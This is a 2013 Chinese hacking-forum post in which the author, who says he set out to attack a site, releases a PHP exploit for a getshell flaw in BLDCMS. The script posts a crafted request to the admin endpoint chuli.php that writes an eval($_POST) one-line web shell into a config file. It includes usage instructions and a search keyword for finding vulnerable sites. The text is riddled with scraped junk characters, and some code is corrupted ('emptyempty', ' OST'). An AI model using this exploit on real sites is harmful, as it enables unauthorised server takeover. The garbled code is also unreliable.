之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞: ?% p( [0 J* ]# l* H
9 c2 E5 d8 |' x# t& z1 d! c7 K
3 ?& v q) g& t: A) h0 i2 Z" L& e+ D话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
% h$ x1 `6 @. Y4 } ! S- R/ u4 ^# e7 C! ?7 S8 z/ F
既然都有人发了 我就把我之前写好的EXP放出来吧& {, Z2 t& r1 C; \; N- y( F2 L
: ?! v/ L; I3 N: y* q
view source print?01.php;">
& y; k0 V8 t* T02.<!--?php
+ X/ B, T9 J; U" l03.echo "-------------------------------------------------------------------& t$ V# J, A0 c, r8 e
04.
; X, Q4 S: B7 w) a05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP# V6 {+ ?3 n6 Z: i5 K2 `4 K0 |# e( f
06. L. q( `1 v2 @0 n/ g
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun" Z$ s$ X5 F( y$ ^! |3 Y
08. 3 t$ [- b5 H& U; [0 f0 ]+ U$ {
09.QQ:981009941\r\n 2013.3.21\r\n
/ r- _& N7 I- e5 R5 e' X10. & u5 x$ v* @, {- _3 I5 z& C: p! D
11. 1 c3 I) O0 ]& k9 c' L9 F
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
2 _- b w- l8 Z13. ) Y7 S+ }) s p7 q* z7 i$ B! o- k
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------# r8 T/ b6 w( B3 [, C k
15. 0 f" F7 Z( a/ r0 C; K4 Z L+ O
16.--------------------------------------------------------------------\r\n";
+ i t/ C+ }- A6 `. w17.$url=$argv[1];$ V. P: a+ x8 J9 q- W$ |; ^
18.$dir=$argv[2];
9 \. R2 g* B" a J$ S% ~5 i! W" s19.$pass=$argv[3];% F" `* y7 _' o. ~6 m
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';, D, L9 Q/ o* z6 d+ r
21.if (emptyempty($pass)||emptyempty($url))1 b6 O! O/ b1 `: T( c
22.{exit("请输入参数");}
% t! w* ]3 A# Z( p( {23.else
* |% e0 V J. V' M24.{3 r# r! f5 q/ A8 ^+ M
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
. O' F' }& K, G; G i26. ; Y- C# u2 O" x. s
27.al;4 p/ ^2 Y& u6 Q: Y' Y! B6 I
28.$length = strlen($fuckdata);
7 i# \7 Z$ w9 t1 N* |" l8 F7 R29.function getshell($url,$pass)+ g/ Q0 G! v; H! y& M0 T2 \ S
30.{
! K% K) i4 e' y% B& V5 T4 s31.global $url,$dir,$pass,$eval,$length,$fuckdata;
- j8 p9 X; A+ n) p2 P) s! x32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";/ B" [( q; q p1 E X
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";, ?) L: A# {1 }" M# K' }
34.$header .= "User-Agent: MSIE\r\n";+ l8 n- [, |5 T; N
35.$header .= "Host:".$url."\r\n";9 g0 z0 {8 E+ y8 K2 ]& Z) F( }
36.$header .= "Content-Length: ".$length."\r\n";* Z8 Z. h" r% F7 u& L0 k
37.$header .= "Connection: Close\r\n";8 D5 Z/ Q6 H- M2 F5 B4 v
38.$header .="\r\n";1 }- M# I( k( B$ `) F9 F4 P! Y
39.$header .= $fuckdata."\r\n\r\n";
7 D- V- D& }: O, @/ G8 N( C40.$fp = fsockopen($url, 80,$errno,$errstr,15);
' U) V! E, T. v! q1 y1 W41.if (!$fp); z2 g0 h9 f3 v0 e6 j! W/ F
42.{+ r7 p. e% ?" I: u! K" m. S( V
43.exit ("利用失败:请检查指定目标是否能正常打开");; i8 b- @" f9 G% U5 C) y- _$ d
44.}
1 s' w; L( s. H& z# Z) `4 I4 a+ a45.else{ if (!fputs($fp,$header))6 M; @+ [& p2 D" x
46.{exit ("利用失败");}
" R# T9 ]8 L) |3 N1 L: e8 g47.else
7 [4 t. Y+ P' Q. ~48.{3 u/ x( I9 {6 O1 l
49.$receive = '';
. _7 p+ l- J( B. F50.while (!feof($fp)) {
( X/ A+ G8 J. N0 N" s" l u51.$receive .= @fgets($fp, 1000);
4 Y& n: P3 w; M52.}! @# H0 T9 o- X1 x$ \
53.@fclose($fp);
! O! P0 h) u4 e$ c54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标& n+ v; o( a; K# @7 x
55.
/ y1 i, }* d% H1 c+ A+ a/ x: J56.GPC是否=off)";) S6 P: a- X* m" V
57.}}5 Q% Z* K' ^" u! d
58.} a. N3 m+ n$ V; q, F
59.}. A- I3 a+ Z5 V) S; `+ k0 e9 ^
60.getshell($url,$pass);2 `2 t. C6 I( W
61.?-->$ z. g% n2 Y. L W; B2 \! h
0 t! l& b9 {- e; |* ^! m" Y+ @% p8 P
z' v/ w( z% z+ m% b6 K9 ~9 O3 ] O
- k3 g/ h& l$ {7 @& sby 数据流! `! `+ \! H' r; F' o
|
发表于 2013-3-26 20:49:10
收藏
支持
反对